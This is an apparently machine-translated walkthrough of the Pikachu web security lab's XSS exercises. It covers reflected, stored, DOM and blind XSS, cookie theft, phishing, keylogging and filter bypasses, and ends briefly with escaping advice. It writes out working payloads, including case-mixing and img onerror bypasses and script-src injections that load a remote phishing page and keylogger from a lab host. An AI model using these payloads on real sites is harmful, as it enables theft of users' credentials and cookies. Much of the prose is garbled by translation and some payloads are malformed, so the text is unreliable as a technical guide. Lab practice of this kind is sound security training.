Reflective xss (get):
1. Make sure that the existence of xss vulnerability on the page. Enter special characters' "<> 6666, click submit, to see if will be filtered out. The results returned are as follows.
2. View the page source and look for the character we just entered in the source page '' <> 6666, found a character input, output in the p tag, this may indicate that if we enter some js code will not be intact moving the output in p tags inside
3. Enter js. Js first test input can be correctly performed (pop), input <script> ( 'xss') </ script>, the successful implementation of the browser
4. View the source code, we found that the payload input, is embedded in the p tag inside. This right is the right to perform js
5. refresh the page before the data does not appear, it will not appear bomb box, which is reflective of xss
6. Enter a payload, <script> (1) </ script>, Click Submit, a pop-up. Submission submission is to get back
xss vulnerabilities get way more easy to use, general use way is to send to the target with the URL disguised cross-site scripting; and post way is the way to submit a form, you can not use the direct URL ways to attack.
Storage type xss:
For the same reasons the storage type xss vulnerabilities with reflective formation, except that the attacker at the storage type xss script can be injected back into the store together to form a more lasting damage, so the storage type xss also known as "permanent" xss.
1. Open-type storage xss, a message board
2. Write a message on the message board, click Submit. Found that our message will appear on the page, refresh the page, the message will not disappear. In other words, we submitted the message is stored in the database backend
3. Does the test interface xss vulnerabilities exist. Enter special characters' "<>? & 6666, click submit, we found that these special characters entered as a message displayed on the page
4. View the source code and found that we've entered a string of special characters are also embedded into the p tag, and did not do any filtering and processing translation
5. Next, input js a simple test script (pop), submit. Click submit, will be submitted to the background, the background data will be stored and then show the form of pop at the front end. FIG pop occurs. Means that the message is stored just entered into the database
6. When you refresh the page, xss window will pop up. Because the input message js script is stored into the database, each time you visit the page, will trigger js script
DOM type xss:
It can be understood as a DOM access to the HTML of a standard programming interface.
1. Open the DOM type xss pikachu
2. Enter a character, click click me, an English pop
3. View source
4 determines whether there xss vulnerability. When the closed configuration, the closed configuration of the # 'onclick = "alert (111)">. The construction of the closure inputs to the page, click Submit
5. Click below '> what do you see? Pops box. This explains the presence of DOM type xss vulnerability
DOM causes of type xss vulnerability is the input end of DOM is acquired, the DOM operation, and then conducted through the distal output DOM. Without background interactions.
DOM type xss-x:
1. Open the next DOM type xss. When prompted for input, submit, will show the word
2. View the page source code. Found that input is obtained from the browser's URL form input point of vulnerability is the parameter of the URL.
3. The next step is a closed configuration. Using just closed # 'onclick = "alert (111)">, or because the output in a label. Input is closed, submitted. This sentence that appears, click and pop will not appear
4. Click on the phrase that appears, there will be another sentence
5. Click on this sentence and then there will appear a second time pop
6. Review the source code that,
XSS get cookie:
get type xss use: the cookie obtain
1. reflective xss (get) Example. The purpose is to get local cookie, and sent back to XSS.
2. Enter the image above payload, click Submit
3. View xss background, will get to the cookie information. The background will be recorded, cookie information corresponding to 127.0.0.1, referer and useragent information
POST type xss use: the cookie obtain (POST way not through the URL submission)
1.POST automatically submit the form page ----- Code Analysis
When a user accesses a page, this page will automatically submits a POST request to a vulnerable site
2. login page
3. Analog malicious site: http: //127.0.0.1/post.html (can be used to simulate two virtual machines). Click on the link to enter, indicating that the attack has been completed, access to the cookie value.
XSS Fishing Case: storage type xss phishing attacks
1. As long as embedded payload can access a backend storage type xss page. The <script src = "http://127.0.0.1/pikachu-master/pkxss/xfish/fish.php"> </ script> embedded into the page, each time the user visits the page, the page will be executed this js and then requests the remote file fish.php
2. After that, just visit this page will pop-up box on the map, as long as the user to enter account number and password will be back to get the file.
XSS keyloggers: storage type xss
Cross-domain:
Cross-domain - origin policy:
For security reasons, all browsers have agreed on the "same origin policy" same origin policy provisions, can not use JS interoperate between two different domain names. Embodiment, js not under x.com domain objects in the domain y.com operation. If you want to cross-domain, you need an administrator special configuration.
1. Code Analysis
2. In the page output such as a storage type xss can invoke a remote method to js. The <script src = "http://127.0.0.1/pikachu-master/pkxss/rkeypress/rk.js"> </ script> is input to the message board. Click submit, at this time, we have to embed this code into the page.
3. Open the console, casually enter a keyboard on the page is the page echo request failed. Because same-origin policy, but 1.5 is the establishment of our own, so allow anyone to access, re-open the storage type xss page. Just enter a few numbers, js will write down all of our input, so that children will get the results xss keyboard input in the background.
XSS touch typing:
xss xss touch typing is an attack scenario. "Xss comfortably," refers to the data submitted in the show background attacker is unknown, the site uses the attacker to insert xss exploit code with a real attack function (usually use the script tag to introduce remote js) data . When the show is not unknown in the background to filter the data submitted, then the back office staff will be triggered when xss operation to achieve good book attacker "real attack function."
Pirates cookie can inject a script obtained by information managers xss comfortably.
1. Open xss comfortably in the pages pikachu. We will see the contents of the page
2. The content presentation, we just enter the data, see what kind of results will be. We found that the commit will be displayed in a box is shown in the words on the page. So that what we do not enter the front page display, but submitted to the backstage, and front-end user can not see the contents of our input. This is comfortably the xss.
3. We enter js statement achieved pop. submit. And it will not be pop in the front page, but in the background
4. analog background administrator login. Tip Tap the page, the background will be prompted to address
5. landing back address
6. On the back page we enter a user name and password to log in. Pop xni will appear after logging in. Because cross-site scripting is executed in the administrator page, this is the xss comfortably.
XSS bypasses:
Filter - Conversion:
- Limit distal bypass, direct capture playback, or modify the front-end code html;
- Case, for example: <SCRIPT> aLeRT (111) <sCRIpt>;
- 拼凑:<scri<script>pt>alert(111)</scri</script>pt>;
- Note the use of interference: <! Scri <- test -> pt> alert (111) <! / Sc <- test -> ript>;
Filter - Code:
The core idea: Background filtered special characters, such as <script> tag, but the tag can be a variety of coding, the background will not necessarily filter. When the browser recognizes the coding, it will translate into a normal tag, thereby performing.
Note that when using an encoder to encode in the output point can be properly recognized and translated
1. Open the page xss filter in pikachu
2. Enter the number corresponding to the character string in the page. Enter the <script>; ";. 66666 Click Submit
3. View the page source code. We found that we just entered the <script> tag was gone, leaving only part of the figure circles. It may be the background for <script> tag we entered was filtered.
4. Further verify if the filter. Use mixed case try to do a bypass. Input <ScRiPT> alert (111) </ ScRIPT>. We found that pop-up box. Description of the rear end of a lowercase script was filtered
5. Because this filter is lowercase <script> tag, can be used img. Input <img src = x onerror = "alert (1111)">. There have been pop
The htmlspecialchars bypass XSS:
About htmlspecialchars () function:
1. Open the page xss htmlspecialchars of the pikachu
2. Enter a random string commit to see how the background is processed. Input 11111 ' "<> &
3. Check the source code to see how the background is the deal with this string of characters. We found <> and "have been subjected encoded, but" does not encode
4. At this time, we construct q'onclick = 'alert (1111)' payload such test, click Submit
5. Click the image above and then framed portion, pop found
XSS common precautions:
The general principle: do filter input and output as an escape.
- Filter: Filters according to service requirements, such as input points in claim enter the phone number, phone number only allows the input digital format.
- Escape: All data is output to the front end are escaped according to the output points, such as the html output to be htnl entity escape, which is the input JS js escape.
The XSS href output:
1. Enter payload, javascript: alert (111), where no special characters. submit
2. View page source
3. Click submit, text page that appears. Found to occur pop. This is because the output of a tag in the href attribute which can be used to perform the protocol javascript js
4. The bypass xss this defense href: only http, https, followed by performing processing htmlspecialchars
The XSS js output: output point is in JS
Js output point xss issue of, how should I repair:
If an entity html coding, although the XSS problem can be solved, but the contents of the entity coding, JS which will not be translated, this will cause the front end features are not available. Therefore, you should use \ to escape special characters in the output point of JS
1. Input random characters. Enter 111111.
2. View the source code. If you enter tmac, what is the output, or other output
3. Enter tmac. The following picture output
4. The closure structure x '</ script> <script> alert (' xss') </ script. xss pop execution
